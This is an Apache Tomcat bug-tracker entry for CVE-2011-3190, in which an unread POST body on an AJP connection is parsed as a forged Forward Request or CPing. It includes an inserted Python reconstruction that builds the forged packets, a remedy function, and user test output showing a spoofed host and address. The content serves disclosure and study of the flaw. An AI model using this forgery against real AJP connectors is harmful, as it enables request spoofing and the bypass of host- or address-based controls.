Bug 51698 - ajp CPing/Forward-Request packet forgery, is a design decision? or a security vulnerability?
Status: RESOLVED FIXED
Product: Tomcat 7
Classification: Unclassified
Component: Connectors
Version: 7.0.20
Hardware: PC All
Importance: P2 normal
Target Milestone: ---
Assigned To: Tomcat Developers Mailing List
Depends on:
Blocks:
Reported: 2011-08-20 07:54 UTC by zhh
Modified: 2014-11-05 18:35 UTC



Attachments
ajp CPing packet forgery example (3.24 KB, application/octet-stream)
2011-08-20 07:54 UTC, zhh
ajp Forward-Request packet forgery (10.83 KB, application/octet-stream)
2011-08-20 07:55 UTC, zhh

Description zhh 2011-08-20 07:54:08 UTC
Created attachment 27416
ajp CPing packet forgery example

Because the AJP "Data" packet has no "CodeType",
and Tomcat adopts a lazy-reading strategy for reading the AJP "Data" packet
(i.e., if you don't invoke request.getParameter("XXX"), Tomcat doesn't read the POST request's "Data" packet),

the current "Data" packet stays in the socket input stream;
the connection is keep-alive, so the AJP BIO/NIO processor reads the next packet,
which this time is the "Data" packet.

If the first byte of the "Data" packet's length is 0x02 (Code Type of the Forward Request packet) or 0x0A (Code Type of the CPing packet),
then Tomcat will be in trouble.

Please see the attachments.

First example: ajp CPing packet forgery example

Second example: ajp Forward-Request packet forgery
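The exchange the report describes, as an added example that is not code from the bug report, its attachments, or Tomcat: a Python reconstruction that builds the AJP13 packets a web server sends to the container (Forward Request, then the request-body "Data" chunk, which carries only a 2-byte length and no prefix code) and a toy container loop that reads the next packet's first payload byte as the prefix code without ever having consumed the body. The header and method codes (0xA008, 0xA00B, POST = 4) are taken from the ajpv13 protocol description; the `drain_body` remedy is one possible fix written for this example and is not a description of the patch Tomcat actually shipped.

```python
# Added illustration for the report above, not code from the bug report, its
# attachments, or Tomcat.  It builds the AJP13 packets a web server sends to
# the container and shows an unread POST body being parsed as the next request.
import struct

AJP_MAGIC = b"\x12\x34"                      # web server -> container framing
JK_AJP13_FORWARD_REQUEST, JK_AJP13_CPING_REQUEST = 0x02, 0x0A
METHOD_POST = 4                              # ajpv13 method code for POST
SC_CONTENT_LENGTH, SC_HOST = 0xA008, 0xA00B  # pre-encoded header names
HEADER_NAMES = {SC_CONTENT_LENGTH: "content-length", SC_HOST: "host"}

def ajp_string(s):
    """AJP string: big-endian u16 length, bytes, NUL terminator."""
    b = s.encode("latin-1")
    return struct.pack(">H", len(b)) + b + b"\x00"

def packet(payload):
    return AJP_MAGIC + struct.pack(">H", len(payload)) + payload

def request_fields(uri, remote_addr, server_name, server_port, headers):
    """Everything in a Forward Request after the prefix code and method byte."""
    out = (ajp_string("HTTP/1.1") + ajp_string(uri) + ajp_string(remote_addr)
           + ajp_string("") + ajp_string(server_name)
           + struct.pack(">HBH", server_port, 0, len(headers)))  # is_ssl=false
    for code, value in headers:
        out += struct.pack(">H", code) + ajp_string(value)
    return out + b"\xff"                                     # attribute terminator

class Reader:
    """Cursor over bytes; stands in for the socket input stream."""
    def __init__(self, data):
        self.data, self.pos = data, 0
    def take(self, n):
        if self.pos + n > len(self.data):
            raise EOFError("truncated AJP stream")
        self.pos += n
        return self.data[self.pos - n:self.pos]
    def u8(self):
        return self.take(1)[0]
    def u16(self):
        return struct.unpack(">H", self.take(2))[0]
    def string(self, n=None):
        n = self.u16() if n is None else n
        if n == 0xFFFF:                       # AJP null string
            return None
        s = self.take(n).decode("latin-1")
        self.take(1)                          # NUL terminator
        return s

def read_packet(stream):
    """Next packet payload, or None at end of stream."""
    if stream.pos >= len(stream.data):
        return None
    if stream.take(2) != AJP_MAGIC:
        raise ValueError("bad AJP magic")
    return stream.take(stream.u16())

def read_request(stream):
    """Vulnerable loop: the byte after the packet length is taken as the prefix
    code, and the body is consumed only if the servlet asks for it."""
    payload = read_packet(stream)
    if payload is None:
        return None
    p = Reader(payload)
    code = p.u8()
    if code == JK_AJP13_CPING_REQUEST:
        return {"cping": True}
    if code != JK_AJP13_FORWARD_REQUEST:
        raise ValueError("unexpected prefix code 0x%02x" % code)
    req = {"method": p.u8(), "protocol": p.string(), "uri": p.string(),
           "remote_addr": p.string(), "remote_host": p.string(),
           "server_name": p.string(), "server_port": p.u16(),
           "is_ssl": bool(p.u8()), "headers": {}}
    for _ in range(p.u16()):
        n = p.u16()                           # 0xA0xx code, else a name length
        name = HEADER_NAMES.get(n, "sc_%04x" % n) if n >> 8 == 0xA0 else p.string(n)
        req["headers"][name] = p.string()
    return req                                # attributes left unparsed

def drain_body(stream, req):
    """One possible remedy (not Tomcat's actual patch): consume the body chunk
    already on the wire before looking for the next request.  A real container
    would request further chunks with GET_BODY_CHUNK (0x06)."""
    remaining = int(req["headers"].get("content-length", "0"))
    while remaining > 0:
        payload = read_packet(stream)
        if payload is None:
            break
        n = struct.unpack(">H", payload[:2])[0]   # body chunk: u16 length + data
        if n == 0:
            break
        remaining -= n

def run(hardened):
    """Constructed exchange: a POST whose body the servlet never reads, then
    whatever the container parses next."""
    legit = packet(bytes([JK_AJP13_FORWARD_REQUEST, METHOD_POST]) + request_fields(
        "/examples/HelloWorld", "10.0.0.5", "www.example.org", 80,
        [(SC_HOST, "www.example.org"), (SC_CONTENT_LENGTH, "516")]))
    # Attacker-chosen body of exactly 0x0204 bytes: the chunk's u16 length is
    # then read as prefix 0x02 (Forward Request) + method 0x04 (POST), and the
    # body itself supplies the forged fields.  Padding after 0xFF is ignored.
    forged = request_fields("/", "1.2.3.4", "my.evil-site.com", 999,
                            [(SC_HOST, "my.evil-site.com")]).ljust(0x0204, b"A")
    body_chunk = packet(struct.pack(">H", len(forged)) + forged)
    stream = Reader(legit + body_chunk)
    first = read_request(stream)          # handled without touching the body
    if hardened:
        drain_body(stream, first)
    return first, read_request(stream)
```

`run(False)` returns the forged request as the second request, with server_name, remote address and port entirely chosen by whoever supplied the POST body; `run(True)` drains the body first and finds nothing further on the wire. A body of 0x0A00 to 0x0AFF bytes would instead be taken for a CPing and answered with a CPong, which is the first attachment's case. The constructed hostnames and addresses mirror the values in Comment 3 but are invented here.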
Comment 1 zhh 2011-08-20 07:55:51 UTC
Created attachment 27417
ajp Forward-Request packet forgery

second example: ajp Forward-Request packet forgery
Comment 2 Mark Thomas 2011-08-29 19:45:57 UTC
This issue has been allocated CVE-2011-3190.

The Tomcat security team strongly discourages the reporting of potential security vulnerabilities via public channels such as this issue tracker. Potential security vulnerabilities should be reported privately to security@tomcat.apache.org

This issue has been fixed in trunk, 7.0.x, 6.0.x and 5.5.x and will be included in 7.0.21, 6.0.34 and 5.5.34 onwards.
Comment 3 Edward Quick 2011-09-02 10:35:50 UTC
Hi there, I was testing this out to see if my site was vulnerable and got the following results. I'm not sure, looking at the code comments in ForwardRequestForgeryExample.java, whether the output below means it's vulnerable and what exactly that exploited. Could you help me out a bit please?

Thanks,
Ed.

C:>java -cp . ForwardRequestForgeryExample
Sending AJP Forward-Request Packet...
End

$ tail -f catalina.out
Invoke HelloWorldExample.doPost method:
-------------------------------------------
Host: my.evil-site.com
RemoteAddr: 1.2.3.4
LocalPort: 999
woo: I am here
Comment 4 Mark Thomas 2011-09-02 10:49:16 UTC
Bugzilla is not a support forum. Please use the users mailing list.
Comment 5 Edward Quick 2011-09-02 13:04:04 UTC
Sorry about that. Will do.